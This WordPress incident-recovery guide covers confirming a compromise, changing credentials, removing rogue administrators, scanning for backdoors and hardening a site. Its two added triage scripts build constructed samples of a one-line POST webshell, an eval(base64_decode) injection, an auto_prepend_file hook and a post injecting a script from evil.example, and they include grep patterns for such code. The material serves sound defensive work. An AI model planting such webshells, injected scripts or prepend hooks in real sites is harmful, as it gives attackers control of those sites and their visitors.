WordPress Site Hacked? Here’s How to Recover and Protect It

A hacked WordPress site can feel like a nightmare. Suddenly, your visitors see strange pop-ups, search engines flag your site as unsafe, or you lose access entirely. It’s stressful, it’s disruptive, and for many site owners, it’s deeply personal — your site represents your hard work, your business, and your reputation.
But the good news? You can recover. And you can protect your site from future attacks with the right measures. In this guide, we’ll walk you through a WordPress hacked site fix, showing you exactly how to remove WordPress malware, secure your files, and prevent future attacks.
1. Stay Calm and Confirm the Hack
Before jumping into recovery, you need to be sure the issue is actually a hack. Sometimes a broken plugin, misconfigured theme, or expired SSL certificate can cause similar symptoms.
Signs of a hacked WordPress site include:
- Your homepage is defaced or replaced with unfamiliar content.
- Strange redirects send visitors to spam or phishing sites.
- Unrecognized admin users appear in your dashboard.
- Files on your server are modified without your knowledge.
- Google flags your site with a “This site may be hacked” warning.
If you’re unsure, scan your site using a security tool like Sucuri SiteCheck or Wordfence Security Scanner. These tools can detect malware, injected scripts, and suspicious changes.
2. Put Your Site into Maintenance Mode
If your WordPress site has been hacked, you don’t want visitors stumbling onto malicious content or redirects. To protect them (and your standing with search engines), temporarily take your site offline while you work on the recovery. Be clear about what this buys you: a maintenance page shields your visitors, but it does not lock the attacker out. Anyone who still holds valid credentials, or who can request a PHP backdoor directly, can keep working while the page is up, which is why the credential and file steps below still matter.
Here are some quick ways to enable maintenance mode:
Use a Plugin
If you still have access to the dashboard, install a plugin like:
- WP Maintenance Mode & Coming Soon – Simple and customizable message with no coding.
- SeedProd – Offers design customization and branding options.
- Under Construction – Quick setup with ready-made templates.
Once activated, you can set a headline, message, and optionally a contact form so users can still reach you.
Use Hosting Provider Tools
Many hosts, including SiteGround, Bluehost, and WP Engine, can restrict public access at the server level through a host-side maintenance page, password protection, or IP allow-listing (a staging copy is a separate thing and does not take the live site offline). Doing it at the host is preferable to a plugin because it takes effect before any of your site’s code runs, so it keeps working even if the attacker has broken the dashboard, and you keep backend access through the host’s own tools.
Manually Enable Maintenance Mode (if dashboard is inaccessible)
If you can’t log in, create a file called .maintenance in your WordPress root directory (next to wp-config.php) containing:
<?php
$upgrading = time();
The opening <?php tag is required: WordPress includes this file as PHP on every request, so without it nothing happens. Normally WordPress treats maintenance as finished once $upgrading is more than ten minutes old, but because time() is re-evaluated on every request the page stays up until you delete the file. This only affects requests that bootstrap WordPress; a PHP file an attacker dropped into wp-content/uploads/ and calls directly never loads WordPress and is unaffected.
3. Change All Your Passwords
Your first security move should be to lock out the attacker. Change passwords for:
- WordPress admin accounts
- Hosting control panel (cPanel, Plesk, etc.)
- FTP/SFTP accounts
- Database (MySQL) login
- Any connected email accounts
Use strong, unique passwords and enable two-factor authentication (2FA) wherever possible. This step is critical because if the hacker still has valid login credentials, they can undo any cleanup work you do later. Two practical notes: if you change the database password, update DB_PASSWORD in wp-config.php at the same time or the site will stop loading; and revoke WordPress application passwords and any API keys or tokens stored in plugin settings, since those authenticate without the account password and survive a password change.
4. Check for Unauthorized Admin Users
After a breach, check whether any new administrator accounts were created. Attackers commonly add admin users so they can return even after you remove visible malware. If you can access the dashboard, go to Users → All Users and filter by “Administrator.” Look at registration dates, display names, and email addresses for anything unfamiliar.
Temporarily disable new registrations in Settings → General (uncheck “Anyone can register”) and force a password reset for all remaining admins.
If you prefer command-line or database checks, you can list administrators with WP-CLI or run a simple SQL query in phpMyAdmin (replace wp_ with your table prefix if different). Always back up the database before running queries or deleting accounts, and export or screenshot the list first so you have evidence to analyze later.
WP-CLI example (SSH access required):
# list administrator accounts
wp user list --role=administrator --fields=ID,user_login,user_email,user_registered --format=table
# delete a suspicious user and reassign their posts to user ID 1 (example)
wp user delete 123 --reassign=1
phpMyAdmin / SQL example:
SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM wp_users u
JOIN wp_usermeta m ON u.ID = m.user_id
WHERE m.meta_key LIKE '%capabilities' AND m.meta_value LIKE '%administrator%';
After removing any unauthorized accounts, force all users to reauthenticate by rotating the authentication keys and salts in wp-config.php. You can generate fresh values with the WordPress secret-key generator at https://api.wordpress.org/secret-key/1.1/salt/, or run wp config shuffle-salts over SSH. Every login cookie is signed with these values, so changing them invalidates the attacker’s existing sessions even if you missed a credential somewhere. Then enable two-factor authentication for the remaining admin users. Finally, keep an eye on audit logs (security plugins like Wordfence, Simple History, or similar) to watch for suspicious account activity and to help identify how the account was created.
5. Back Up Your Site — Yes, Even If It’s Hacked
It might sound counterintuitive, but before making changes, back up your hacked site. This gives you a copy of the compromised files and database that you can analyze later to understand the attack vector. It also ensures you have something to fall back on if cleanup goes wrong.
Save both your site files and database to your local computer or secure cloud storage. Do not overwrite your existing safe backups (if you have them) — keep this infected copy separate.
6. Identify the Entry Point and Damage
Hacks usually happen through vulnerabilities in plugins or themes, weak or reused passwords, outdated WordPress versions, or insecure hosting. To identify the cause:
- Check your web server’s access logs around the time of the compromise. Bursts of POST requests to wp-login.php or xmlrpc.php suggest brute force; requests to PHP files that should not exist (especially under /wp-content/uploads/) point to a dropped backdoor, and the first request to such a file often reveals the entry point.
- Compare your current WordPress core files to a fresh download from WordPress.org. WP-CLI does this for you with wp core verify-checksums, and wp plugin verify-checksums does the same for plugins from the official directory. Differences may reveal malicious injections.
- Review recently modified files in /wp-content/themes/ and /wp-content/plugins/.
- Look for unknown PHP files, especially in /wp-content/uploads/, /tmp/, or the site root.
This is also the time to see if your database has been tampered with. Malicious actors often inject spam links or scripts into posts and options, change the siteurl and home options to redirect the whole site, or create hidden admin accounts, usually through a vulnerable plugin (an SQL injection or privilege-escalation flaw) rather than through WordPress core.
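One way to look for that tampering in the database export you took in step 5, offered here as an added example rather than code from the original article (the same search is what step 7 means by cleaning wp_posts, wp_users and wp_options). The dump fragment embedded in the script is constructed, the table prefix is assumed to be wp_, and the script expects one row per INSERT line, which mysqldump produces when you export with --skip-extended-insert.

```shell
#!/bin/sh
# Added example (not from the original article): triage a mysqldump export of the
# WordPress database for injected markup, rewritten URLs and planted administrators.
# Every sample row below is constructed; the table prefix is assumed to be wp_.
# Export the real database with:  mysqldump --skip-extended-insert <db> > dump.sql
# so that each row sits on its own INSERT line, which is what this script expects.

make_sample_dump() {
  cat > "$1" <<'EOF'
INSERT INTO `wp_options` VALUES (1,'siteurl','https://example.com','yes');
INSERT INTO `wp_options` VALUES (2,'home','https://example.com','yes');
INSERT INTO `wp_options` VALUES (33,'active_plugins','a:2:{i:0;s:19:"akismet/akismet.php";i:1;s:23:"wp-helper/wp-helper.php";}','yes');
INSERT INTO `wp_options` VALUES (90,'users_can_register','1','yes');
INSERT INTO `wp_posts` VALUES (10,1,'2024-03-01 10:00:00','<p>Welcome to our site.</p>','Welcome','publish');
INSERT INTO `wp_posts` VALUES (11,1,'2024-03-02 11:00:00','<p>Hello</p><script src="https://evil.example/j.js"></script>','Contact','publish');
INSERT INTO `wp_posts` VALUES (12,1,'2024-03-03 12:00:00','<div style="display:none"><a href="https://spam.example/">cheap pills</a></div>','About','publish');
INSERT INTO `wp_users` VALUES (1,'admin','$P$Bhash','admin','owner@example.com','','2020-01-01 00:00:00','',0,'admin');
INSERT INTO `wp_users` VALUES (7,'wpsupport','$P$Bhash','wpsupport','x@mail.example','','2024-03-02 11:05:00','',0,'wpsupport');
INSERT INTO `wp_usermeta` VALUES (1,1,'wp_capabilities','a:1:{s:13:"administrator";b:1;}');
INSERT INTO `wp_usermeta` VALUES (2,7,'wp_capabilities','a:1:{s:13:"administrator";b:1;}');
EOF
}

# Print the INSERT rows of one table whose text matches an extended regex.
dump_rows() {  # $1 dump file, $2 table name, $3 regex
  grep -E "^INSERT INTO \`$2\` VALUES" "$1" | grep -E "$3"
}

# Posts carrying injected script/iframe tags or hidden-link markup.
suspicious_posts() {
  dump_rows "$1" wp_posts '<script|<iframe|display: ?none|visibility: ?hidden'
}
suspicious_post_count() { suspicious_posts "$1" | wc -l | tr -d ' '; }

# siteurl/home must be your own domain; attackers rewrite them to redirect the whole site.
site_urls() { dump_rows "$1" wp_options "'(siteurl|home)'"; }

# Options that decide which code runs and who may sign up; compare with what you expect.
risky_options() { dump_rows "$1" wp_options "'(active_plugins|users_can_register|default_role)'"; }

# User IDs whose capabilities meta grants administrator (same idea as the SQL query in step 4).
admin_user_ids() {
  dump_rows "$1" wp_usermeta 'capabilities.*s:13:"administrator"' \
    | sed -E 's/^INSERT INTO `wp_usermeta` VALUES \([0-9]+,([0-9]+),.*/\1/'
}

# Logins of administrators registered after a cutoff (YYYY-MM-DD): accounts created mid-attack.
# Splitting on commas is fine for this constructed dump; real rows with commas inside
# display names or URLs need a proper SQL parser.
admins_registered_after() {  # $1 dump file, $2 cutoff date
  for id in $(admin_user_ids "$1"); do
    dump_rows "$1" wp_users "VALUES \($id," \
      | awk -F, -v cutoff="$2" -v q="'" \
          '{ login=$2; reg=$7; gsub(q, "", login); gsub(q, "", reg); if (reg > cutoff) print login }'
  done
}

# With no argument the script triages the constructed dump:  sh triage-dump.sh [dump.sql]
DUMP="${1:-}"
if [ -z "$DUMP" ]; then DUMP=$(mktemp); make_sample_dump "$DUMP"; MADE=1; fi
echo "== siteurl / home";                         site_urls "$DUMP"
echo "== plugin and registration options";        risky_options "$DUMP"
echo "== posts with injected markup ($(suspicious_post_count "$DUMP"))"; suspicious_posts "$DUMP"
echo "== administrators registered since 2024-02-01"; admins_registered_after "$DUMP" 2024-02-01
if [ -n "${MADE:-}" ]; then rm -f "$DUMP"; fi
```

The admin check mirrors the SQL query in step 4 but runs against the export, so it works even when the attacker has locked you out of phpMyAdmin. Read the output against what you know: an active_plugins entry you never installed, users_can_register set to 1 when you never allowed sign-ups, or a siteurl that is not your domain each deserve a line in your incident notes.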
7. Clean Your WordPress Files and Database
If you have a clean backup from before the hack, restoring it is often the fastest solution, but make sure the backup predates the compromise. Restoring alone does not close the hole the attacker came through, so pair it with the password changes in step 3 and the updates in step 10 or expect to be reinfected.
If you must clean manually:
- Replace all core WordPress files with fresh copies from WordPress.org (everything except wp-config.php and the wp-content/ directory, which hold your configuration and content).
- Remove unused or suspicious plugins and themes, and reinstall the ones you keep from the official directory or the vendor rather than trusting the copies already on the server.
- Scan for malicious code like base64_decode, eval(), or long strings of obfuscated characters. Some legitimate plugins use these functions too, so treat each hit as a lead to inspect rather than proof of infection.
- Clean the database by searching for suspicious entries in wp_posts, wp_users, and wp_options.
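A file-system triage pass covering the checks in step 6 (recently modified files, stray PHP under uploads/) and the code-pattern scan in step 7, written here as an added example rather than code from the original article. With no argument it builds a small constructed WordPress-like directory tree containing invented infected files so it runs offline; pass a real document root as the first argument to use it on a site. The sample paths, file contents and the base64 payload (which decodes to nothing more than phpinfo();) are all assumptions made for the demo.

```shell
#!/bin/sh
# Added example (not from the original article): file-system triage for a hacked WordPress
# install. Builds a constructed tree when no path is given:  sh triage-files.sh [/var/www/html]
# The infected sample files below are invented for the demo.

make_sample_tree() {
  root="$1"
  mkdir -p "$root/wp-content/uploads/2024/03" "$root/wp-content/plugins/akismet" \
           "$root/wp-content/themes/twentytwentyfour"
  printf 'not really an image\n' > "$root/wp-content/uploads/2024/03/photo.jpg"
  # constructed variable-function webshell of the kind dropped into uploads/ after a compromise
  printf '<?php $_POST["c"]($_POST["a"]);\n' > "$root/wp-content/uploads/2024/03/wp-class.php"
  printf '<?php // clean plugin code\n' > "$root/wp-content/plugins/akismet/akismet.php"
  # constructed obfuscated injection in a theme file (the payload decodes to phpinfo();)
  printf '<?php eval(base64_decode("cGhwaW5mbygpOw=="));\n' > "$root/wp-content/themes/twentytwentyfour/functions.php"
  # constructed .user.ini that makes PHP prepend a hidden file to every request
  printf 'auto_prepend_file = /home/site/wp-content/uploads/.x.php\n' > "$root/.user.ini"
  printf '<?php define("DB_NAME", "wp");\n' > "$root/wp-config.php"
  # files the attacker did not touch keep an old modification time
  touch -t 202001010000 "$root/wp-config.php" "$root/wp-content/plugins/akismet/akismet.php" \
                        "$root/wp-content/uploads/2024/03/photo.jpg"
}

# 1. PHP under uploads/ is almost never legitimate: WordPress stores media there, not code.
php_in_uploads() {
  find "$1/wp-content/uploads" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' \) | sort
}

# 2. Files changed in the last N days; compare the list with your own deploy and update dates.
recently_modified() {  # $1 docroot, $2 days
  find "$1" -type f -mtime -"$2" | sort
}

# 3. Code patterns worth a look: eval/base64/gz obfuscation, variable-function webshells
#    such as $_POST['x'](...), and auto_prepend_file in php.ini/.user.ini/.htaccess.
#    Legitimate plugins use some of these calls too, so each hit is a lead, not a verdict.
suspicious_code() {
  find "$1" -type f \( -name '*.php' -o -name '.user.ini' -o -name 'php.ini' -o -name '.htaccess' \) \
    -exec grep -lE 'eval\(|base64_decode\(|gzinflate\(|gzuncompress\(|str_rot13\(|auto_prepend_file|\$_(GET|POST|REQUEST|COOKIE)\[[^]]*\] *\(' {} + | sort
}

count_lines() { wc -l | tr -d ' '; }

ROOT="${1:-}"
if [ -z "$ROOT" ]; then ROOT=$(mktemp -d); make_sample_tree "$ROOT"; MADE=1; fi
echo "== PHP files under uploads/";           php_in_uploads "$ROOT"
echo "== files modified in the last 7 days";  recently_modified "$ROOT" 7
echo "== files with suspicious code";         suspicious_code "$ROOT"
if [ -n "${MADE:-}" ]; then rm -rf "$ROOT"; fi
```

Run it before you clean anything and keep the output next to the backup from step 5. Hits from suspicious_code need a human look: a caching or optimisation plugin may legitimately call base64_decode, whereas a .user.ini pointing auto_prepend_file at a file under uploads/ almost never is. For core and official-directory plugins, wp core verify-checksums and wp plugin verify-checksums give an exact file-by-file answer that this heuristic scan cannot.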
If this process feels overwhelming, consider hiring a professional cleanup service like Sucuri or MalCare — they can often restore a site within hours.
8. Check and Remove Backdoors
Backdoors are hidden scripts that hackers leave behind so they can re-enter your site even after you clean it. Manually finding them means combing through PHP files — not fun, and easy to miss something.
Instead, use automated tools to scan for them:
Wordfence Security (Plugin)
Install and run a full scan. Wordfence compares your core, plugin, and theme files to originals in the WordPress repository. It flags altered files, suspicious code patterns (like eval() or base64_decode), and unknown PHP scripts in unexpected locations. You can then delete or repair infected files directly from the plugin.
MalCare Security (Plugin + Cloud Scan)
Uses off-site servers to scan your site without slowing it down. Detects hidden malware and backdoors that may evade basic scanners. Can automatically remove malware with one click in the premium version.
Sucuri SiteCheck (Web Tool)
Visit https://sitecheck.sucuri.net and run a scan. It checks for malicious code, blacklisting, and security anomalies. While it’s mainly an external scanner, it’s good for spotting issues before digging deeper.
Server-Level Malware Scanners (Host Provided)
Some hosts offer ClamAV, ImunifyAV, or custom malware scanners in cPanel or their dashboard. These can find unusual PHP files in directories like /wp-content/uploads/ where hackers often hide scripts.
WP-CLI Malware Scan (For Advanced Users)
If you have SSH access, WP-CLI’s built-in wp core verify-checksums and wp plugin verify-checksums compare the installed files against the official release hashes and list every added or altered file, and Wordfence publishes a standalone command-line scanner as well. Running these over SSH lets you scan large sites without hitting browser or PHP execution-time limits.
After removing a backdoor, always check the .htaccess file in your root directory; hackers often use it to hide or redirect traffic without adding obvious malware. Check the other places that execute code without showing up as a plugin or theme as well: php.ini or .user.ini files setting auto_prepend_file, extra include lines in wp-config.php, files in wp-content/mu-plugins/ (must-use plugins load automatically and never appear as deactivatable), and scheduled tasks in both WordPress cron (wp cron event list) and the system crontab. The goal is a complete WordPress malware cleanup, removing every trace of infection.
9. Request Search Engine Review
If Google or Bing flagged your site as hacked or containing malware, you need to request a review after cleaning.
For Google:
- Log into Google Search Console.
- Check the Security Issues tab.
- Click “Request a Review” after confirming your site is clean.
Approval can take anywhere from a few hours to a few days.
10. Strengthen Your WordPress Security
Once your site is back online, focus on prevention. Key measures include:
- Keeping WordPress core, plugins, and themes updated, and removing anything you no longer use (an inactive plugin’s files can still be exploited).
- Using only trusted plugins/themes from reputable developers.
- Installing a security plugin like Wordfence or Solid Security (formerly iThemes Security) to monitor activity.
- Enforcing strong passwords and 2FA for all users.
- Limiting admin access and disabling unused accounts: give editors and authors only the role their work needs.
- Disabling the in-dashboard file editor by adding define('DISALLOW_FILE_EDIT', true); to wp-config.php, so a stolen admin session cannot be turned into code execution through Appearance → Theme File Editor.
- Moving the login page from /wp-login.php (and the /wp-admin redirect) to a custom URL. This cuts down automated brute-force noise, but it is obscurity, not protection; it does not replace 2FA and login rate limiting.
11. Monitor Your Site Continuously
Security is not a one-time fix. Enable ongoing monitoring to detect suspicious activity early:
- Set up email alerts from your security plugin for file changes and failed login attempts.
- Schedule automatic daily or weekly backups, stored off the web server (a backup the attacker can reach from the compromised site is one they can delete or infect too).
- Regularly scan your site for malware.
By building these habits, you dramatically reduce the chances of falling victim again.
12. Hire a WordPress Support Agency
One of the most effective ways to safeguard your website is to hire a WordPress support agency. These agencies provide ongoing maintenance, security monitoring, malware removal, and regular updates for your site. They’re equipped with the expertise needed to address vulnerabilities quickly, prevent attacks, and ensure your site remains secure. Investing in professional support ensures you have a dedicated team watching over your website 24/7, giving you peace of mind and allowing you to focus on other aspects of your business.
Final Thoughts
A hack doesn’t have to mean the end of your site. By following this WordPress hacked site fix process, you can remove WordPress malware, recover your files, and rebuild your site’s security. Act quickly, stay vigilant, and invest in ongoing protection to avoid future incidents.
Think of this incident as a wake-up call — WordPress is powerful, but its security depends on vigilance, timely updates, and safe practices. Protecting your site is an ongoing process, but with the right steps, you can keep your hard work safe from attackers.